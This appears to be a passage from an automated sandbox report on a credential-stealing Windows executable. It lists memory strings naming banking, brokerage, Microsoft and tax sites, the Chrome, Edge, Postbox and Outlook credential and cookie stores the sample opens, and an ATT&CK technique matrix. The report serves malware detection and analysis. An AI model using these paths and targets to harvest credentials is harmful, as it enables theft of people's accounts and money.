            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeAPI call chain: ExitProcess graph end nodegraph_0-4001
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeAPI call chain: ExitProcess graph end nodegraph_0-3996
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_6FF71A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FF71A98
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess created: C:\Users\user\Desktop\hUMdKouQ1H.exe "C:\Users\user\Desktop\hUMdKouQ1H.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeQueries volume information: C:\Users\user\Desktop\hUMdKouQ1H.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hUMdKouQ1H.exe PID: 7952, type: MEMORYSTR
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: hUMdKouQ1H.exe PID: 7952, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hUMdKouQ1H.exe PID: 7952, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            12
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets14
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.